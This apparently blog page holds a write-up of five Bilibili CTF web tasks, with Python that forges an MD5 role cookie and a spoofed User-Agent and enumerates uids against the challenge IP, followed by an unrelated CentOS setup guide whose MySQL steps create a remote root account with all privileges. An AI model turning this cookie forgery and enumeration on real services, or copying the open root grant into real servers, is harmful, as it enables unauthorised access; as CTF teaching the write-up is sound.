Bilibili CTF

2020-10-24

Task 1. What is behind the page?

Challenge URL: http://45.113.201.36/index.html

Open the developer tools (F12); the script tag says it all:

<script>
$.ajax({
    url: "api/admin",
    type: "get",
    success: function (data) {
        //console.log(data);
        if (data.code == 200) {
            // if there is a value: the front end shows it
            var input = document.getElementById("flag1");
            input.value = String(data.data);
        } else {
            // if there is no value
            $('#flag1').html("API error, please try again later~");
        }
    }
})
</script>

As the script shows, the front end only displays whatever api/admin returns, so sending a GET request directly to http://45.113.201.36/api/admin yields flag1.

Task 2. The real secret can only be seen with a special device

Same URL as task 1.

<script>
$.ajax({
    url: "api/ctf/2",
    type: "get",
    success: function (data) {
        //console.log(data);
        if (data.code == 200) {
            // if there is a value: the front end shows it
            $('#flag2').html("flag2: " + data.data);
        } else {
            // if there is no value
            $('#flag2').html("Please visit with the bilibili Security Browser~");
        }
    }
})
</script>

The hint suggests changing the browser's User-Agent to bilibili Security Browser.

With that User-Agent header set, a GET request to http://45.113.201.36/api/ctf/2 returns flag2. The check is on a client-controlled header, so any HTTP client that sets it passes.

Task 3. What is the password?

Challenge URL: http://45.113.201.36/login.html

Just guess it.

username: admin

password: bilibili

Enter them and flag3 appears straight away.

Task 4. Sorry, insufficient permissions~

Challenge URL: http://45.113.201.36/superadmin.html

<script>
$.ajax({
    url: "api/ctf/4",
    type: "get",
    success: function (data) {
        console.log(data);
        if (data.code == 200) {
            // if there is a value: the front end shows it
            $('#flag').html("Welcome, super administrator~ the answer is : {{ " + data.data + " }}".toLowerCase())
        } else {
            // if there is no value
            $('#flag').html("Some secrets can only be seen by the super administrator~")
        }
    }
})
</script>

Open F12 and look at the request: the cookie carries a parameter

role=ee11cbb19052e40b07aac0ca060c23ee

Looking it up in an MD5 reverse table shows it is the hash of user (a bare, unsalted MD5 of a common word, so it reverses instantly).

Back to the page's hint: "Some secrets can only be seen by the super administrator~"

So take Administrator and MD5 it:

7b7bc2512ee1fedcd76bdc68926d4f7b

Replace the role value in the original cookie with this hash and send the GET request to get flag4. The role is taken entirely from a client-side cookie with nothing binding it to a server-side session, which is why simply rewriting it works.

Task 5. Someone else's secret

Challenge URL: http://45.113.201.36/user.html

<script>
$(function () {

    (function ($) {
        $.getUrlParam = function (name) {
            var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
            var r = window.location.search.substr(1).match(reg);
            if (r != null) return unescape(r[2]); return null;
        }
    })(jQuery);

    var uid = $.getUrlParam('uid');
    if (uid == null) {
        uid = 100336889;
    }
    $.ajax({
        url: "api/ctf/5?uid=" + uid,
        type: "get",
        success: function (data) {
            console.log(data);
            if (data.code == 200) {
                // if there is a value: the front end shows it
                $('#flag').html("Welcome, super administrator~ flag : " + data.data)
            } else {
                // if there is no value
                $('#flag').html("The answer you want is not here~")
            }
        }
    })
});
</script>

The request carries a uid parameter, and presumably the server decides from the uid alone whether the caller is the super administrator (a classic insecure direct object reference: the client picks the object, the server never checks ownership).

So brute-force the uid. Python 3 code below:

import requests

# Session state: the role cookie from task 4 and the User-Agent from task 2
headers = {"User-Agent": "bilibili Security Browser"}
cookies = {"role": "your role cookie value"}

# 100336889 is the default uid in the page script. Walking up to 999999999
# one request at a time is not realistic; narrow the range before running.
for uid in range(100336889, 999999999):
    params = {"uid": uid}
    res = requests.get("http://45.113.201.36/api/ctf/5", headers=headers,
                       params=params, cookies=cookies, timeout=10).json()
    # The page script compares data.code == 200 numerically, so compare with the
    # int 200 here; the original check against the string '403' never matched
    if res.get("code") == 200:
        print(uid, res)
        break
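The following is an added example and not code from the original writeup. It pulls tasks 2, 4 and 5 into one small stdlib-only client: the User-Agent the API expects, the unsalted MD5 role cookie (reversing the observed value and forging a new one), and uid enumeration. The host, paths, UA string and the two hashes come from the writeup; the function names (role_hash, identify_role, forge_headers, make_fetcher, scan_uids), the candidate role list, and the fake API with its hidden admin uid are my own assumptions, constructed so the scanning logic runs offline without touching the server.

```python
import hashlib
import json
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Optional, Tuple

BASE_URL = "http://45.113.201.36"           # challenge host from the writeup
SECURITY_UA = "bilibili Security Browser"   # task 2: the UA the API checks for
OBSERVED_ROLE = "ee11cbb19052e40b07aac0ca060c23ee"  # task 4: role cookie as seen in F12


def role_hash(role_name: str) -> str:
    """Task 4: the role cookie is the bare MD5 of the role name, no salt."""
    return hashlib.md5(role_name.encode()).hexdigest()


# Assumed candidate list; an unsalted hash of a common word falls to a tiny wordlist.
ROLE_CANDIDATES = ("user", "User", "admin", "Admin", "administrator",
                   "Administrator", "superadmin", "root")


def identify_role(digest: str, candidates=ROLE_CANDIDATES) -> Optional[str]:
    """Reverse an unsalted MD5 role cookie by hashing each candidate and comparing."""
    digest = digest.lower()
    for name in candidates:
        if role_hash(name) == digest:
            return name
    return None


def forge_headers(role_name: str, extra_cookie: str = "") -> Dict[str, str]:
    """Headers for any HTTP client: the required UA plus a forged role cookie."""
    cookie = "role=" + role_hash(role_name)
    if extra_cookie:
        cookie = extra_cookie + "; " + cookie
    return {"User-Agent": SECURITY_UA, "Cookie": cookie}


def make_fetcher(base_url: str, headers: Dict[str, str]) -> Callable[[str, dict], dict]:
    """Return fetch(path, params) -> dict that GETs JSON with the given headers.
    An HTTP error is mapped to {"code": <status>} so callers can treat the HTTP
    status and the API's own 'code' field uniformly."""
    def fetch(path: str, params: dict) -> dict:
        url = "%s/%s?%s" % (base_url, path, urllib.parse.urlencode(params))
        req = urllib.request.Request(url, headers=headers)
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return json.loads(resp.read().decode())
        except urllib.error.HTTPError as e:
            return {"code": e.code}
    return fetch


def scan_uids(fetch: Callable[[str, dict], dict], uids, stop_on_first: bool = True) -> List[Tuple[int, object]]:
    """Task 5: try each uid against api/ctf/5 and collect those answered with code 200.
    'code' may arrive as an int or a string, so normalise before comparing; an int
    compared against the string '403' (the original loop's check) never matches."""
    hits = []
    for uid in uids:
        res = fetch("api/ctf/5", {"uid": uid})
        if int(res.get("code") or 0) == 200:
            hits.append((uid, res.get("data")))
            if stop_on_first:
                break
    return hits


# Constructed fake API for offline use: exactly one hidden uid returns 200,
# and it returns code as a string to exercise the normalisation above.
FAKE_ADMIN_UID = 100336893


def fake_fetch(path: str, params: dict) -> dict:
    if path == "api/ctf/5" and int(params["uid"]) == FAKE_ADMIN_UID:
        return {"code": "200", "data": "flag{constructed}"}
    return {"code": 403, "data": None}


if __name__ == "__main__":
    print(identify_role(OBSERVED_ROLE))
    print(forge_headers("Administrator"))
    print(scan_uids(fake_fetch, range(100336889, 100336900)))
    # Live run against the challenge host (needs network), same logic, real fetcher:
    # fetch = make_fetcher(BASE_URL, forge_headers("Administrator"))
    # print(scan_uids(fetch, range(100336889, 100336889 + 1000)))
```

Keeping the transport behind fetch() is what lets the enumeration be checked against the fake API first; swapping in make_fetcher() with the forged headers is the only change needed for the live host, and the loop stops at the first hit instead of walking the whole range.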

The remaining tasks are unsolved for now.

The server went down while I was working on them, so I stopped; I will carry on once it is back up.

CentOS 7: installing Nginx + Python 3 + MySQL

Nginx

Install Nginx

yum install -y gcc-c++ pcre pcre-devel zlib zlib-devel
# This is the plain HTTP build. For HTTPS, also install openssl-devel and
# pass --with-http_ssl_module to ./configure; it is not enabled by default.

mkdir /usr/local/nginx
cd /usr/local/nginx
wget -c https://nginx.org/download/nginx-1.18.0.tar.gz
tar -zxvf nginx-1.18.0.tar.gz
cd nginx-1.18.0
./configure --prefix=/usr/local/nginx
make
make install

ln -s /usr/local/nginx/sbin/nginx /usr/local/bin/nginx

Python 3

Install Python 3

yum -y groupinstall "Development tools"
# zlib1g-dev is a Debian package name and does not exist in the CentOS repos; zlib-devel covers it
yum -y install zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel gdbm-devel db4-devel libpcap-devel xz-devel libffi-devel

# Alpine equivalent (apk), not needed on CentOS:
# apk add build-base zlib-dev openssl-dev gcc libffi-dev libc-dev make

mkdir /usr/local/python3
cd /usr/local/python3
wget -c https://www.python.org/ftp/python/3.7.8/Python-3.7.8.tar.xz
tar -xvJf Python-3.7.8.tar.xz
cd Python-3.7.8
# openssl-devel above is what the ssl module needs (--with-ssl is not a configure
# option and is ignored); --enable-optimizations adds PGO and a much longer build
./configure --prefix=/usr/local/python3 --enable-optimizations
make
make install

ln -s /usr/local/python3/bin/python3 /usr/local/bin/python3
ln -s /usr/local/python3/bin/pip3 /usr/local/bin/pip3

MySQL

Install MySQL

# MySQL 8
rpm -Uvh https://dev.mysql.com/get/mysql80-community-release-el7-3.noarch.rpm
# run `yum module disable mysql` first if this errors
yum --enablerepo=mysql80-community install mysql-community-server -y

# MySQL 5.7
rpm -Uvh https://dev.mysql.com/get/mysql57-community-release-el7-11.noarch.rpm
# run `yum module disable mysql` first if this errors
yum --enablerepo=mysql57-community install mysql-community-server -y

Start MySQL

service mysqld start    # start the MySQL service
service mysqld status   # check the service status

grep "A temporary password" /var/log/mysqld.log   # find the generated initial root password

mysql -u root -p        # then enter the initial password

-- Relax the password policy (MySQL 8 variable names)
set global validate_password.length=1;
set global validate_password.policy=0;
set global validate_password.check_user_name=off;

-- If the statements above error (MySQL 5.7 variable names)
set global validate_password_policy=LOW;
set global validate_password_length=6;

-- Change the root password
ALTER USER 'root'@'localhost' IDENTIFIED BY 'password';

-- Create a remote user and grant privileges
CREATE USER 'root'@'%' IDENTIFIED BY 'password';
grant all privileges on *.* to 'root'@'%' ;

-- Switch both accounts to the mysql_native_password authentication plugin
ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';
ALTER USER 'root'@'%' IDENTIFIED WITH mysql_native_password BY 'password';

Three things to keep in mind. The SET GLOBAL changes are not persisted, so the relaxed password policy reverts at the next restart; that is fine for a one-off password change, but it also means the relaxed values do not survive for later accounts. root@'%' with ALL PRIVILEGES on *.* is a root login from any host; on anything other than a throwaway box, create a dedicated user restricted to the application's database and the client's host instead, and keep port 3306 behind the firewall. Finally, the last two ALTER USER statements do not restore the password rules; they switch the accounts from MySQL 8's default caching_sha2_password plugin to the older mysql_native_password, which is only needed for clients that cannot speak the newer plugin.